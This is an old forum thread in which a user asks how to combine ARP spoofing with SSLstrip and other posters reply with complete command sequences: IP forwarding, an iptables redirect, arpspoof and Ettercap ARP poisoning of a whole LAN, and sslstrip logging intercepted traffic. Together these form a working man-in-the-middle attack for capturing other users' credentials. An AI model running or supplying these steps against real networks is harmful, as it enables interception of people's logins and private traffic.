uberleethax0r Posted December 6, 2009 Share Posted December 6, 2009 Howdy all! I recently started watching Hak5, and have started to be a little more paranoid about my own online security. I want to try out some of the projects for myself, just to get a sense of network security. I have been working on getting SSLstrip to work on my own Windows computers, but I'm having a little trouble. So, I can get SSL strip to work properly if I set the target machine's Firefox settings to listen to the hacker machine's port that I forwarded, as an HTTP proxy. Obviously, no man in the middle attack victims will have their proxy set that way, so I want to try ARP spoofing. I can get Arp spoofing to properly send traffic from the target computer through mine, using Ettercap or Arpspoof, but for some reason, SSLstrip doesn't work using it. Anyone know how to fix that? Quote Link to comment Share on other sites More sharing options...
uberleethax0r Posted December 6, 2009 Author Share Posted December 6, 2009 Whoops, sorry if I posted this topic in the wrong section. I guess I didn't read it properly. Quote Link to comment Share on other sites More sharing options...
thefatmoop Posted December 9, 2009 Share Posted December 9, 2009 i was thinking the same thing... using an ssl strip on just 1 person is pointless. ssl stripping on a highly active line is more realistic Quote Link to comment Share on other sites More sharing options...
uberleethax0r Posted December 12, 2009 Author Share Posted December 12, 2009 i was thinking the same thing... using an ssl strip on just 1 person is pointless. ssl stripping on a highly active line is more realistic Er, yeah. I kinda think you missed the point. What I'm saying is how do you get sslstrip to work with arp poisoning? Like, instead of setting the victim's firefox http proxy to 192.168.1.2:80 ,etc. Quote Link to comment Share on other sites More sharing options...
taiyed14 Posted December 12, 2009 Share Posted December 12, 2009 just out of curiosity, how are you running arpspoof and sslstrip working on windows? Quote Link to comment Share on other sites More sharing options...
uberleethax0r Posted December 13, 2009 Author Share Posted December 13, 2009 http://sourceforge.net/projects/arpspoof/ for arpspoof windows binary. python with python libraries for sslstrip, and http://kennethxu.blogspot.com/2006/04/java...forwarding.html for port forwarding Quote Link to comment Share on other sites More sharing options...
thefatmoop Posted December 13, 2009 Share Posted December 13, 2009 Er, yeah. I kinda think you missed the point. What I'm saying is how do you get sslstrip to work with arp poisoning? Like, instead of setting the victim's firefox http proxy to 192.168.1.2:80 ,etc. ... Quote Link to comment Share on other sites More sharing options...
taiyed14 Posted December 14, 2009 Share Posted December 14, 2009 you should be able to give arpspoof a wild card operator. arpspoof -t thegateway * Quote Link to comment Share on other sites More sharing options...
uberleethax0r Posted December 14, 2009 Author Share Posted December 14, 2009 you should be able to give arpspoof a wild card operator. arpspoof -t thegateway * As in, arpspoof everyone in the subnet? Does that work? Anyway, what does that do for me? Like arpspoof -t 192.168.1.* 192.168.1.1 or variant? In every variant of that, it just gives back an error and doesn't do anything. Quote Link to comment Share on other sites More sharing options...
uberleethax0r Posted December 22, 2009 Author Share Posted December 22, 2009 So, anyone got any ideas? Quote Link to comment Share on other sites More sharing options...
taiyed14 Posted December 22, 2009 Share Posted December 22, 2009 $ man arpspoof SYNOPSIS arpspoof [-i interface] [-t target] host <SNIP> OPTIONS -i interface Specify the interface to use. -t target Specify a particular host to ARP poison (if not specified, all hosts on the LAN). host Specify the host you wish to intercept packets for (usually the local gateway). Quote Link to comment Share on other sites More sharing options...
uberleethax0r Posted December 23, 2009 Author Share Posted December 23, 2009 Dang, that's scary that that works... Someone can actually make everybody on the LAN think their computer is a gateway.. As far as I can tell, that arpspoofing seems to work flawlessly. HOWEVER: I DON'T CARE ABOUT ARSPOOFING EVERYONE ON A LAN! Why does SSLstrip not work when arpspoof-ified? Arpspoofing and SSLstrip each work on their own, but not together. Also, how do I get that to work? I guess I didn't explain my question very well, but anyone get it now? Has anyone had this trouble? I followed the instructions exactly from Hak5, but the sslstrip-age doesn't work without specifically declaring the target computer to follow the port sslstrip listens on. Quote Link to comment Share on other sites More sharing options...
taiyed14 Posted December 23, 2009 Share Posted December 23, 2009 ive had no issues. config iptables to forward traffic on port 80 to 8080 start ssl strip -l 8080 start arpspoof -i eth0 -t 192,168.1.100 192.168.1.1 http://www.thoughtcrime.org/software/sslstrip/ it's pretty simple Quote Link to comment Share on other sites More sharing options...
uberleethax0r Posted December 23, 2009 Author Share Posted December 23, 2009 ive had no issues. config iptables to forward traffic on port 80 to 8080 start ssl strip -l 8080 start arpspoof -i eth0 -t 192,168.1.100 192.168.1.1 http://www.thoughtcrime.org/software/sslstrip/ it's pretty simple Okay, ah well.. Thanks for the info.. Quote Link to comment Share on other sites More sharing options...
uberleethax0r Posted December 28, 2009 Author Share Posted December 28, 2009 K, so, I tried it in three operating systems: Windows, Backtrack (Which is a butt- it took me hours to get my wireless card working with ndiswrapper, but, that's another story.) and Ubuntu although I don't see why it would matter. I also tested it on three different LANs just to make sure it wasn't my gateway noticing it somehow. So, first enable ip forwarding in the sysctrl configuration, and then sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 and then sudo python sslstrip.py -l 8080 Arpspoofing: sudo arpspoof -i eth1 -t 192.168.0.5 192.168.0.1 /me doesn't get why it doesn't work. It works perfectly when I set an http proxy to the hax0r computer on port 8080, but arpspoofing doesn't work. We haven't made any progress on this forum thread. (No offense to you that answered - thank you.) Anyone got ideas? Quote Link to comment Share on other sites More sharing options...
taiyed14 Posted December 28, 2009 Share Posted December 28, 2009 i don't understand what you mean when you say 'it doesn't work'. what doesn't work? sslstrip or arpspoof? 192.168.0.5 is the computer you want to trick 192.168.0.1 is the gateway you want to impersonate what is the MAC address of the gateway and of the computer you're running arpspoof on? Now check the target computer. What does it THINK the MAC address of the gateway is? arp -a Quote Link to comment Share on other sites More sharing options...
uberleethax0r Posted December 28, 2009 Author Share Posted December 28, 2009 i don't understand what you mean when you say 'it doesn't work'. what doesn't work? sslstrip or arpspoof? 192.168.0.5 is the computer you want to trick 192.168.0.1 is the gateway you want to impersonate what is the MAC address of the gateway and of the computer you're running arpspoof on? Now check the target computer. What does it THINK the MAC address of the gateway is? arp -a They both work on their own. Arpspoofing properly makes the target think that the gateway is the mac address of the hax0r computer, but it doesn't strip ssl. Quote Link to comment Share on other sites More sharing options...
The Game Posted January 10, 2010 Share Posted January 10, 2010 Better of running up a linux vmware ie backtrack. Save you alot of hassle. Its like 5 steps to get this working, Very simple. Sends everything in clear text to a logfile. Ive had no issues with it. Quote Link to comment Share on other sites More sharing options...
myswordnu Posted January 23, 2010 Share Posted January 23, 2010 sorry wrong topic couldnt find anywhere to delete my replay so yeah lol Quote Link to comment Share on other sites More sharing options...
stewman Posted June 3, 2011 Share Posted June 3, 2011 I know this is an old post, but was wondering if you ever found a solution to your problem. I am experiencing the exact same issue. Quote Link to comment Share on other sites More sharing options...
nykon Posted June 6, 2011 Share Posted June 6, 2011 (edited) Flip your box into forwarding mode: echo "1" > /proc/sys/net/ipv4/ip_forward Setup iptables to redirect HTTP traffic to sslstrip: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort> Launch Ettercap: ettercap -i <interface> -TqM ARP:REMOTE // // Run sslstrip: sslstrip -a -l <listenPort> Sorted. Edited June 6, 2011 by nykon Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.